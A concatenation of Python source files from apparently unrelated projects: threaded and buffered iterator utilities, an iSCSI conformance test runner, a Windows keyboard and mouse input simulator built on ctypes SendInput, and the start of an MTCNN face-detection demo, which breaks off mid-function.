from typing import Any, TypeVar, Iterable, Iterator, List, Callable, Optional, Union, Tuple
T = TypeVar('T')
__all__ = ['ThreadedIterator', 'MultiWorkerCallableIterator', 'BufferedIterator', 'DoubleBufferedIterator', 'shuffled_iterator']
class ThreadedIterator(Iterator[T]):
"""An iterator object that computes its elements in a single parallel thread to be ready to be consumed.
The iterator should *not* return `None`. Elements of the original iterable will be shuffled arbitrarily."""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int = 2, enabled: bool = True):
self.__is_enabled = enabled
if enabled:
self.__queue = queue.Queue(maxsize=max_queue_size) # type: queue.Queue[Optional[T]]
self.__thread = threading.Thread(target=lambda: self.__worker(self.__queue, original_iterator))
self.__thread.start()
else:
self.__original_iterator = original_iterator
@staticmethod
def __worker(queue: queue.Queue, original_iterator: Iterator[T])-> None:
try:
for element in original_iterator:
assert element is not None, 'By convention, Iterables wrapped in ThreadedIterator may not contain None.'
queue.put(element, block=True)
queue.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
queue.put((e, tb), block=True)
def __next__(self) -> T:
next_element = self.__queue.get(block=True)
if next_element is None:
self.__thread.join()
self.__queue.put(None) # Make sure that we remember that we are done if we are called once more...
raise StopIteration
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
return next_element
def __iter__(self):
if self.__is_enabled:
return self
else:
return self.__original_iterator
class MultiWorkerCallableIterator(Iterable):
"""An iterator that computes its elements in parallel workers to be ready to be consumed. The iterator should
have at least one element. The order of the callables is shuffled arbitrarily."""
def __init__(self, argument_iterator: Iterator[Iterable], worker_callable: Callable, max_queue_size: int=1, num_workers: int = 5, use_threads: bool=True):
self.__in_queue = queue.Queue() if use_threads else multiprocessing.Queue() # type: Union[queue.Queue, multiprocessing.Queue]
self.__num_elements = 0
for callable_args in argument_iterator:
self.__in_queue.put(callable_args)
self.__num_elements += 1
self.__out_queue = queue.Queue(maxsize=max_queue_size) if use_threads else multiprocessing.Queue(
maxsize=max_queue_size
) # type: Union[queue.Queue, multiprocessing.Queue]
self.__threads = [
threading.Thread(target=lambda: self.__worker(worker_callable)) if use_threads
else multiprocessing.Process(target=lambda: self.__worker(worker_callable)) for _ in range(num_workers)
] # type: List[Union[threading.Thread, multiprocessing.Process]]
for worker in self.__threads:
worker.start()
def __worker(self, worker_callable):
try:
while not self.__in_queue.empty():
next_element = self.__in_queue.get(block=False)
result = worker_callable(*next_element)
self.__out_queue.put(result)
except queue.Empty:
pass
except Exception as e:
_, __, tb = sys.exc_info()
self.__out_queue.put((e, tb), block=True)
def __iter__(self):
for _ in range(self.__num_elements):
next_element = self.__out_queue.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
for worker in self.__threads:
worker.join()
class BufferedIterator(Iterable[T]):
"""An iterator object that computes its elements in a parallel process, ready to be consumed.
The iterator should *not* return None"""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int=3, enabled: bool=True):
self.__original_iterator = original_iterator
self.__is_enabled = enabled
if enabled:
self.__buffer = multiprocessing.Queue(maxsize=max_queue_size) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
self.__worker_process = multiprocessing.Process(target=lambda: self.__worker(original_iterator))
self.__worker_process.start()
def __worker(self, original_iterator: Iterator[T]) -> None:
"""Implementation of worker thread. Iterates over the original iterator, pulling results
and putting them into a buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer.put(element, block=True)
self.__buffer.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
self.__buffer.put((e, tb), block=True)
def __iter__(self):
if not self.__is_enabled:
yield from self.__original_iterator
return
next_element = self.__buffer.get(block=True)
while next_element is not None:
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
next_element = self.__buffer.get(block=True)
self.__worker_process.join()
class DoubleBufferedIterator(Iterator[T]):
"""An iterator object that wraps double buffering around an iterable sequence.
This avoids waits in downstream applications if each step of the inner iterable can take a long while,
as the Queue used in (Single)BufferedIterator requires consumer and producer to synchronize.
Note: The inner iterable should *not* return None"""
def __init__(self, original_iterable: Iterable[T], max_queue_size_inner: int=20, max_queue_size_outer: int=5):
self.__buffer_inner = multiprocessing.Queue(maxsize=max_queue_size_inner) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
self.__buffer_outer = multiprocessing.Queue(maxsize=max_queue_size_outer) # type: multiprocessing.Queue[Union[None, T, Tuple[Exception, Any]]]
self.__worker_process_inner = multiprocessing.Process(target=lambda: self.__worker_inner(original_iterable))
self.__worker_process_outer = multiprocessing.Process(target=lambda: self.__worker_outer())
self.__worker_process_inner.start()
self.__worker_process_outer.start()
def __worker_inner(self, original_iterator: Iterable[T]) -> None:
"""Consumes elements from the original iterator, putting them into an inner buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer_inner.put(element, block=True)
self.__buffer_inner.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in inner worker of DoubleBufferedIterator:\n %s" % (e, "".join(
traceback.format_tb(tb)
)))
self.__buffer_inner.put((e, tb), block=True)
def __worker_outer(self) -> None:
"""Consumes elements from the inner worker and just passes them through to the outer buffer."""
try:
next_element = self.__buffer_inner.get(block=True)
while next_element is not None:
self.__buffer_outer.put(next_element, block=True)
next_element = self.__buffer_inner.get(block=True)
self.__buffer_outer.put(next_element, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in outer worker of DoubleBufferedIterator:\n %s" % (
e, "".join(traceback.format_tb(tb))
))
self.__buffer_outer.put((e, tb), block=True)
def __iter__(self):
return self
def __next__(self):
next_element = self.__buffer_outer.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
elif next_element is None:
self.__worker_process_inner.join()
self.__worker_process_outer.join()
raise StopIteration
return next_element
def shuffled_iterator(input_iterator: Iterator[T], buffer_size: int = 10000, out_slice_sizes: int = 500) -> Iterator[T]:
"""
Accept an iterator and return an approximate streaming (and memory efficient) shuffled iterator.
To achieve (approximate) shuffling a buffer of elements is stored. Once the buffer is full, it is shuffled and
`out_slice_sizes` random elements from the buffer are returned. Thus, there is a good bias for
yielding the first set of elements in input early.
"""
assert out_slice_sizes <= buffer_size, 'out_slices_size cannot be larger than buffer_size.'
buffer = [] # type: List[T]
for element in input_iterator:
buffer.append(element)
if len(buffer) > buffer_size:
random.shuffle(buffer)
for _ in range(out_slice_sizes):
yield buffer.pop()
random.shuffle(buffer)
yield from buffer
|
calsoft.py | import os
import time
import sys
import subprocess
import threading
import json
CALSOFT_BIN_PATH = "/usr/local/calsoft/iscsi-pcts-v1.5/bin"
'''
11/26/2015 disable tc_login_11_2 and tc_login_11_4
RFC 7143 6.3
Neither the initiator nor the target should attempt to declare or
negotiate a parameter more than once during login, except for
responses to specific keys that explicitly allow repeated key
declarations (e.g., TargetAddress)
The spec didn't make it clear what other keys could be re-declare
Disscussed this with UNH and get the conclusion that TargetName/
TargetAddress/MaxRecvDataSegmentLength could be re-declare.
'''
'''
12/1/2015 add tc_login_2_2 to known_failed_cases
RFC 7143 6.1
A standard-label MUST begin with a capital letter and must not exceed
63 characters.
key name: A standard-label
'''
known_failed_cases = ['tc_ffp_15_2', 'tc_ffp_29_2', 'tc_ffp_29_3',
'tc_err_1_1', 'tc_err_1_2', 'tc_err_2_8',
'tc_err_3_1', 'tc_err_3_2', 'tc_err_3_3',
'tc_err_3_4', 'tc_err_5_1', 'tc_login_3_1',
'tc_login_11_2', 'tc_login_11_4', 'tc_login_2_2']
def run_case(case, result_list, log_dir_path):
try:
case_log = subprocess.check_output("{}/{}".format(CALSOFT_BIN_PATH, case), stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
result_list.append({"Name": case, "Result": "FAIL"})
case_log = e.output
else:
result_list.append({"Name": case, "Result": "PASS"})
with open(log_dir_path + case + '.txt', 'w') as f:
f.write(case_log)
def main():
if not os.path.exists(CALSOFT_BIN_PATH):
print "The Calsoft test suite is not available on this machine."
sys.exit(1)
output_dir = sys.argv[1]
if len(sys.argv) > 2:
output_file = sys.argv[2]
else:
output_file = "%s/calsoft.json" % (output_dir)
log_dir = "%s/calsoft/" % output_dir
all_cases = [x for x in os.listdir(CALSOFT_BIN_PATH) if x.startswith('tc')]
all_cases.sort()
case_result_list = []
result = {"Calsoft iSCSI tests": case_result_list}
if not os.path.exists(log_dir):
os.mkdir(log_dir)
for case in known_failed_cases:
print "Skipping %s. It is known to fail." % (case)
case_result_list.append({"Name": case, "Result": "SKIP"})
thread_objs = []
left_cases = list(set(all_cases) - set(known_failed_cases))
index = 0
max_thread_count = 32
while index < len(left_cases):
cur_thread_count = 0
for thread_obj in thread_objs:
if thread_obj.is_alive():
cur_thread_count += 1
while cur_thread_count < max_thread_count and index < len(left_cases):
thread_obj = threading.Thread(target=run_case, args=(left_cases[index], case_result_list, log_dir, ))
thread_obj.start()
time.sleep(0.02)
thread_objs.append(thread_obj)
index += 1
cur_thread_count += 1
end_time = time.time() + 30
while time.time() < end_time:
for thread_obj in thread_objs:
if thread_obj.is_alive():
break
else:
break
else:
print "Thread timeout"
exit(1)
with open(output_file, 'w') as f:
json.dump(obj=result, fp=f, indent=2)
failed = 0
for x in case_result_list:
if x["Result"] == "FAIL":
print "Test case %s failed." % (x["Name"])
failed = 1
exit(failed)
if __name__ == '__main__':
main()
|
keys.py | # Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
# downloaded from https://github.com/Sentdex/pygta5/blob/master/keys.py
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
class Keys(object):
common = None
standalone = False
# instance of worker class
keys_worker = None
keys_process = None
# key constants
direct_keys = 0x0008
virtual_keys = 0x0000
key_press = 0x0000
key_release = 0x0002
# mouse constants
mouse_move = 0x0001
mouse_lb_press = 0x0002
mouse_lb_release = 0x0004
mouse_rb_press = 0x0008
mouse_rb_release = 0x0010
mouse_mb_press = 0x0020
mouse_mb_release = 0x0040
# direct keys
dk = {
"1": 0x02,
"2": 0x03,
"3": 0x04,
"4": 0x05,
"5": 0x06,
"6": 0x07,
"7": 0x08,
"8": 0x09,
"9": 0x0A,
"0": 0x0B,
"NUMPAD1": 0x4F, "NP1": 0x4F,
"NUMPAD2": 0x50, "NP2": 0x50,
"NUMPAD3": 0x51, "NP3": 0x51,
"NUMPAD4": 0x4B, "NP4": 0x4B,
"NUMPAD5": 0x4C, "NP5": 0x4C,
"NUMPAD6": 0x4D, "NP6": 0x4D,
"NUMPAD7": 0x47, "NP7": 0x47,
"NUMPAD8": 0x48, "NP8": 0x48,
"NUMPAD9": 0x49, "NP9": 0x49,
"NUMPAD0": 0x52, "NP0": 0x52,
"DIVIDE": 0xB5, "NPDV": 0xB5,
"MULTIPLY": 0x37, "NPM": 0x37,
"SUBSTRACT": 0x4A, "NPS": 0x4A,
"ADD": 0x4E, "NPA": 0x4E,
"DECIMAL": 0x53, "NPDC": 0x53,
"NUMPADENTER": 0x9C, "NPE": 0x9C,
"A": 0x1E,
"B": 0x30,
"C": 0x2E,
"D": 0x20,
"E": 0x12,
"F": 0x21,
"G": 0x22,
"H": 0x23,
"I": 0x17,
"J": 0x24,
"K": 0x25,
"L": 0x26,
"M": 0x32,
"N": 0x31,
"O": 0x18,
"P": 0x19,
"Q": 0x10,
"R": 0x13,
"S": 0x1F,
"T": 0x14,
"U": 0x16,
"V": 0x2F,
"W": 0x11,
"X": 0x2D,
"Y": 0x15,
"Z": 0x2C,
"F1": 0x3B,
"F2": 0x3C,
"F3": 0x3D,
"F4": 0x3E,
"F5": 0x3F,
"F6": 0x40,
"F7": 0x41,
"F8": 0x42,
"F9": 0x43,
"F10": 0x44,
"F11": 0x57,
"F12": 0x58,
"UP": 0xC8,
"LEFT": 0xCB,
"RIGHT": 0xCD,
"DOWN": 0xD0,
"ESC": 0x01,
"SPACE": 0x39, "SPC": 0x39,
"RETURN": 0x1C, "ENT": 0x1C,
"INSERT": 0xD2, "INS": 0xD2,
"DELETE": 0xD3, "DEL": 0xD3,
"HOME": 0xC7,
"END": 0xCF,
"PRIOR": 0xC9, "PGUP": 0xC9,
"NEXT": 0xD1, "PGDN": 0xD1,
"BACK": 0x0E,
"TAB": 0x0F,
"LCONTROL": 0x1D, "LCTRL": 0x1D,
"RCONTROL": 0x9D, "RCTRL": 0x9D,
"LSHIFT": 0x2A, "LSH": 0x2A,
"RSHIFT": 0x36, "RSH": 0x36,
"LMENU": 0x38, "LALT": 0x38,
"RMENU": 0xB8, "RALT": 0xB8,
"LWIN": 0xDB,
"RWIN": 0xDC,
"APPS": 0xDD,
"CAPITAL": 0x3A, "CAPS": 0x3A,
"NUMLOCK": 0x45, "NUM": 0x45,
"SCROLL": 0x46, "SCR": 0x46,
"MINUS": 0x0C, "MIN": 0x0C,
"LBRACKET": 0x1A, "LBR": 0x1A,
"RBRACKET": 0x1B, "RBR": 0x1B,
"SEMICOLON": 0x27, "SEM": 0x27,
"APOSTROPHE": 0x28, "APO": 0x28,
"GRAVE": 0x29, "GRA": 0x29,
"BACKSLASH": 0x2B, "BSL": 0x2B,
"COMMA": 0x33, "COM": 0x33,
"PERIOD": 0x34, "PER": 0x34,
"SLASH": 0x35, "SLA": 0x35,
}
# virtual keys
vk = {
"1": 0x31,
"2": 0x32,
"3": 0x33,
"4": 0x34,
"5": 0x35,
"6": 0x36,
"7": 0x37,
"8": 0x38,
"9": 0x39,
"0": 0x30,
"NUMPAD1": 0x61, "NP1": 0x61,
"NUMPAD2": 0x62, "NP2": 0x62,
"NUMPAD3": 0x63, "NP3": 0x63,
"NUMPAD4": 0x64, "NP4": 0x64,
"NUMPAD5": 0x65, "NP5": 0x65,
"NUMPAD6": 0x66, "NP6": 0x66,
"NUMPAD7": 0x67, "NP7": 0x67,
"NUMPAD8": 0x68, "NP8": 0x68,
"NUMPAD9": 0x69, "NP9": 0x69,
"NUMPAD0": 0x60, "NP0": 0x60,
"DIVIDE": 0x6F, "NPDV": 0x6F,
"MULTIPLY": 0x6A, "NPM": 0x6A,
"SUBSTRACT": 0x6D, "NPS": 0x6D,
"ADD": 0x6B, "NPA": 0x6B,
"DECIMAL": 0x6E, "NPDC": 0x6E,
"NUMPADENTER": 0x0D, "NPE": 0x0D,
"A": 0x41,
"B": 0x42,
"C": 0x43,
"D": 0x44,
"E": 0x45,
"F": 0x46,
"G": 0x47,
"H": 0x48,
"I": 0x49,
"J": 0x4A,
"K": 0x4B,
"L": 0x4C,
"M": 0x4D,
"N": 0x4E,
"O": 0x4F,
"P": 0x50,
"Q": 0x51,
"R": 0x52,
"S": 0x53,
"T": 0x54,
"U": 0x55,
"V": 0x56,
"W": 0x57,
"X": 0x58,
"Y": 0x59,
"Z": 0x5A,
"F1": 0x70,
"F2": 0x71,
"F3": 0x72,
"F4": 0x73,
"F5": 0x74,
"F6": 0x75,
"F7": 0x76,
"F8": 0x77,
"F9": 0x78,
"F10": 0x79,
"F11": 0x7A,
"F12": 0x7B,
"UP": 0x26,
"LEFT": 0x25,
"RIGHT": 0x27,
"DOWN": 0x28,
"ESC": 0x1B,
"SPACE": 0x20, "SPC": 0x20,
"RETURN": 0x0D, "ENT": 0x0D,
"INSERT": 0x2D, "INS": 0x2D,
"DELETE": 0x2E, "DEL": 0x2E,
"HOME": 0x24,
"END": 0x23,
"PRIOR": 0x21, "PGUP": 0x21,
"NEXT": 0x22, "PGDN": 0x22,
"BACK": 0x08,
"TAB": 0x09,
"LCONTROL": 0xA2, "LCTRL": 0xA2,
"RCONTROL": 0xA3, "RCTRL": 0xA3,
"LSHIFT": 0xA0, "LSH": 0xA0,
"RSHIFT": 0xA1, "RSH": 0xA1,
"LMENU": 0xA4, "LALT": 0xA4,
"RMENU": 0xA5, "RALT": 0xA5,
"LWIN": 0x5B,
"RWIN": 0x5C,
"APPS": 0x5D,
"CAPITAL": 0x14, "CAPS": 0x14,
"NUMLOCK": 0x90, "NUM": 0x90,
"SCROLL": 0x91, "SCR": 0x91,
"MINUS": 0xBD, "MIN": 0xBD,
"LBRACKET": 0xDB, "LBR": 0xDB,
"RBRACKET": 0xDD, "RBR": 0xDD,
"SEMICOLON": 0xBA, "SEM": 0xBA,
"APOSTROPHE": 0xDE, "APO": 0xDE,
"GRAVE": 0xC0, "GRA": 0xC0,
"BACKSLASH": 0xDC, "BSL": 0xDC,
"COMMA": 0xBC, "COM": 0xBC,
"PERIOD": 0xBE, "PER": 0xBE,
"SLASH": 0xBF, "SLA": 0xBF,
}
# setup object
def __init__(self, common = None):
self.keys_worker = KeysWorker(self)
# Thread(target=self.keys_worker.processQueue).start()
self.common = common
if common is None:
self.standalone = True
# parses keys string and adds keys to the queue
def parseKeyString(self, string):
# print keys
if not self.standalone:
self.common.info("Processing keys: %s" % string)
key_queue = []
errors = []
# defaults to direct keys
key_type = self.direct_keys
# split by comma
keys = string.upper().split(",")
# translate
for key in keys:
# up, down or stroke?
up = True
down = True
direction = key.split("_")
subkey = direction[0]
if len(direction) >= 2:
if direction[1] == 'UP':
down = False
else:
up = False
# switch to virtual keys
if subkey == "VK":
key_type = self.virtual_keys
# switch to direct keys
elif subkey == "DK":
key_type = self.direct_keys
# key code
elif subkey.startswith("0x"):
subkey = int(subkey, 16)
if subkey > 0 and subkey < 256:
key_queue.append({
"key": int(subkey),
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
else:
errors.append(key)
# pause
elif subkey.startswith("-"):
time = float(subkey.replace("-", ""))/1000
if time > 0 and time <= 10:
key_queue.append({
"key": None,
"okey": "",
"time": time,
"up": False,
"down": False,
"type": None,
})
else:
errors.append(key)
# direct key
elif key_type == self.direct_keys and subkey in self.dk:
key_queue.append({
"key": self.dk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# virtual key
elif key_type == self.virtual_keys and subkey in self.vk:
key_queue.append({
"key": self.vk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# no match?
else:
errors.append(key)
# if there are errors, do not process keys
if len(errors):
return errors
# create new thread if there is no active one
if self.keys_process is None or not self.keys_process.isAlive():
self.keys_process = Thread(target=self.keys_worker.processQueue)
self.keys_process.start()
# add keys to queue
for i in key_queue:
self.keys_worker.key_queue.put(i)
self.keys_worker.key_queue.put(None)
return True
# direct key press
def directKey(self, key, direction = None, type = None):
if type is None:
type = self.direct_keys
if direction is None:
direction = self.key_press
if key.startswith("0x"):
key = int(key, 16)
else:
key = key.upper()
lookup_table = self.dk if type == self.direct_keys else self.vk
key = lookup_table[key] if key in lookup_table else 0x0000
self.keys_worker.sendKey(key, direction | type)
# direct mouse move or button press
def directMouse(self, dx = 0, dy = 0, buttons = 0):
self.keys_worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
class KeysWorker():
# keys object
keys = None
# queue of keys
key_queue = Queue()
# init
def __init__(self, keys):
self.keys = keys
# main function, process key's queue in loop
def processQueue(self):
# endless loop
while True:
# get one key
key = self.key_queue.get()
# terminate process if queue is empty
if key is None:
self.key_queue.task_done()
if self.key_queue.empty():
return
continue
# print key
elif not self.keys.standalone:
self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
key["okey"] if key["okey"] else "None",
key["key"], key["time"],
"UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
"None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
)
# if it's a key
if key["key"]:
# press
if key["down"]:
self.sendKey(key["key"], self.keys.key_press | key["type"])
# wait
sleep(key["time"])
# and release
if key["up"]:
self.sendKey(key["key"], self.keys.key_release | key["type"])
# not an actual key, just pause
else:
sleep(key["time"])
# mark as done (decrement internal queue counter)
self.key_queue.task_done()
# send key
def sendKey(self, key, type):
self.SendInput(self.Keyboard(key, type))
# send mouse
def sendMouse(self, dx, dy, buttons):
if dx != 0 or dy != 0:
buttons |= self.keys.mouse_move
self.SendInput(self.Mouse(buttons, dx, dy))
# send input
def SendInput(self, *inputs):
nInputs = len(inputs)
LPINPUT = INPUT * nInputs
pInputs = LPINPUT(*inputs)
cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)
# get input object
def Input(self, structure):
if isinstance(structure, MOUSEINPUT):
return INPUT(0, _INPUTunion(mi=structure))
if isinstance(structure, KEYBDINPUT):
return INPUT(1, _INPUTunion(ki=structure))
if isinstance(structure, HARDWAREINPUT):
return INPUT(2, _INPUTunion(hi=structure))
raise TypeError('Cannot create INPUT structure!')
# mouse input
def MouseInput(self, flags, x, y, data):
return MOUSEINPUT(x, y, data, flags, 0, None)
# keyboard input
def KeybdInput(self, code, flags):
return KEYBDINPUT(code, code, flags, 0, None)
# hardware input
def HardwareInput(self, message, parameter):
return HARDWAREINPUT(message & 0xFFFFFFFF,
parameter & 0xFFFF,
parameter >> 16 & 0xFFFF)
# mouse object
def Mouse(self, flags, x=0, y=0, data=0):
return self.Input(self.MouseInput(flags, x, y, data))
# keyboard object
def Keyboard(self, code, flags=0):
return self.Input(self.KeybdInput(code, flags))
# hardware object
def Hardware(self, message, parameter=0):
return self.Input(self.HardwareInput(message, parameter))
# types
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort
class MOUSEINPUT(ctypes.Structure):
_fields_ = (('dx', LONG),
('dy', LONG),
('mouseData', DWORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
_fields_ = (('wVk', WORD),
('wScan', WORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class HARDWAREINPUT(ctypes.Structure):
_fields_ = (('uMsg', DWORD),
('wParamL', WORD),
('wParamH', WORD))
class _INPUTunion(ctypes.Union):
_fields_ = (('mi', MOUSEINPUT),
('ki', KEYBDINPUT),
('hi', HARDWAREINPUT))
class INPUT(ctypes.Structure):
_fields_ = (('type', DWORD),
('union', _INPUTunion))
#example:
if __name__ == '__main__':
sleep(3)
keys = Keys()
# mouse movement
for i in range(100):
keys.directMouse(-1*i, 0)
sleep(0.004)
# mouse keys
keys.directMouse(buttons=keys.mouse_rb_press)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_lb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_rb_release)
# or
keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
# keyboard (direct keys)
keys.directKey("a")
sleep(0.04)
keys.directKey("a", keys.key_release)
# keyboard (virtual keys)
keys.directKey("a", type=keys.virtual_keys)
sleep(0.04)
keys.directKey("a", keys.key_release, keys.virtual_keys)
# queue of keys (direct keys, threaded, only for keybord input)
keys.parseKeyString("a_down,-4,a_up,0x01") # -4 - pause for 4 ms, 0x00 - hex code of Esc
# queue of keys (virtual keys, threaded, only for keybord input)
keys.parseKeyString("vk,a_down,-4,a_up") # -4 - pause for 4 ms
|
demo_mp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from multiprocessing import Process, Queue
from timeit import default_timer as timer
from time import sleep
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bouding boxes
if reg.shape[1] == 1:
print("reshape of reg")
pass # reshape of reg
w = boundingbox[:,2] - boundingbox[:,0] + 1
h = boundingbox[:,3] - boundingbox[:,1] + 1
bb0 = boundingbox[:,0] + reg[:,0]*w
bb1 = boundingbox[:,1] + reg[:,1]*h
bb2 = boundingbox[:,2] + reg[:,2]*w
bb3 = boundingbox[:,3] + reg[:,3]*h
boundingbox[:,0:4] = np.array([bb0, bb1, bb2, bb3]).T
#print "bb", boundingbox
return boundingbox
def pad(boxesA, w, h):
boxes = boxesA.copy() # shit, value parameter!!!
#print '#################'
#print 'boxes', boxes
#print 'w,h', w, h
tmph = boxes[:,3] - boxes[:,1] + 1
tmpw = boxes[:,2] - boxes[:,0] + 1
numbox = boxes.shape[0]
#print 'tmph', tmph
#print 'tmpw', tmpw
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:,0:1][:,0]
y = boxes[:,1:2][:,0]
ex = boxes[:,2:3][:,0]
ey = boxes[:,3:4][:,0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
ex[tmp] = w-1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
ey[tmp] = h-1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy = np.maximum(0, dy-1)
dx = np.maximum(0, dx-1)
y = np.maximum(0, y-1)
x = np.maximum(0, x-1)
edy = np.maximum(0, edy-1)
edx = np.maximum(0, edx-1)
ey = np.maximum(0, ey-1)
ex = np.maximum(0, ex-1)
#print "dy" ,dy
#print "dx" ,dx
#print "y " ,y
#print "x " ,x
#print "edy" ,edy
#print "edx" ,edx
#print "ey" ,ey
#print "ex" ,ex
#print 'boxes', boxes
return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
# convert bboxA to square
w = bboxA[:,2] - bboxA[:,0]
h = bboxA[:,3] - bboxA[:,1]
l = np.maximum(w,h).T
#print 'bboxA', bboxA
#print 'w', w
#print 'h', h
#print 'l', l
bboxA[:,0] = bboxA[:,0] + w*0.5 - l*0.5
bboxA[:,1] = bboxA[:,1] + h*0.5 - l*0.5
bboxA[:,2:4] = bboxA[:,0:2] + np.repeat([l], 2, axis = 0).T
return bboxA
def nms(boxes, threshold, type):
"""nms
:boxes: [:,0:5]
:threshold: 0.5 like
:type: 'Min' or others
:returns: TODO
"""
if boxes.shape[0] == 0:
return np.array([])
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
s = boxes[:,4]
area = np.multiply(x2-x1+1, y2-y1+1)
I = np.array(s.argsort()) # read s using I
pick = [];
while len(I) > 0:
xx1 = np.maximum(x1[I[-1]], x1[I[0:-1]])
yy1 = np.maximum(y1[I[-1]], y1[I[0:-1]])
xx2 = np.minimum(x2[I[-1]], x2[I[0:-1]])
yy2 = np.minimum(y2[I[-1]], y2[I[0:-1]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if type == 'Min':
o = inter / np.minimum(area[I[-1]], area[I[0:-1]])
else:
o = inter / (area[I[-1]] + area[I[0:-1]] - inter)
pick.append(I[-1])
I = I[np.where( o <= threshold)[0]]
return pick
def generateBoundingBox(map, reg, scale, t):
stride = 2
cellsize = 12
map = map.T
dx1 = reg[0,:,:].T
dy1 = reg[1,:,:].T
dx2 = reg[2,:,:].T
dy2 = reg[3,:,:].T
(x, y) = np.where(map >= t)
yy = y
xx = x
'''
if y.shape[0] == 1: # only one point exceed threshold
y = y.T
x = x.T
score = map[x,y].T
dx1 = dx1.T
dy1 = dy1.T
dx2 = dx2.T
dy2 = dy2.T
# a little stange, when there is only one bb created by PNet
#print "1: x,y", x,y
a = (x*map.shape[1]) + (y+1)
x = a/map.shape[0]
y = a%map.shape[0] - 1
#print "2: x,y", x,y
else:
score = map[x,y]
'''
#print "dx1.shape", dx1.shape
#print 'map.shape', map.shape
score = map[x,y]
reg = np.array([dx1[x,y], dy1[x,y], dx2[x,y], dy2[x,y]])
if reg.shape[0] == 0:
pass
boundingbox = np.array([yy, xx]).T
bb1 = np.fix((stride * (boundingbox) + 1) / scale).T # matlab index from 1, so with "boundingbox-1"
bb2 = np.fix((stride * (boundingbox) + cellsize - 1 + 1) / scale).T # while python don't have to
score = np.array([score])
boundingbox_out = np.concatenate((bb1, bb2, score, reg), axis=0)
#print '(x,y)',x,y
#print 'score', score
#print 'reg', reg
return boundingbox_out.T
def drawBoxes(im, boxes):
if boxes.shape[0]==0 or boxes.shape[1]==0:
return im
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
for i in range(x1.shape[0]):
cv2.rectangle(im, (int(x1[i]), int(y1[i])), (int(x2[i]), int(y2[i])), (0,255,0), 1)
return im
from time import time
_tstart_stack = []
def tic():
_tstart_stack.append(time())
def toc(fmt="Elapsed: %s s"):
print(fmt % (time()-_tstart_stack.pop()))
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
img2 = img.copy()
factor_count = 0
total_boxes = np.zeros((0,9), np.float)
points = []
h = img.shape[0]
w = img.shape[1]
minl = min(h, w)
img = img.astype(float)
m = 12.0/minsize
minl = minl*m
#total_boxes = np.load('total_boxes.npy')
#total_boxes = np.load('total_boxes_242.npy')
#total_boxes = np.load('total_boxes_101.npy')
# create scale pyramid
scales = []
while minl >= 12:
scales.append(m * pow(factor, factor_count))
minl *= factor
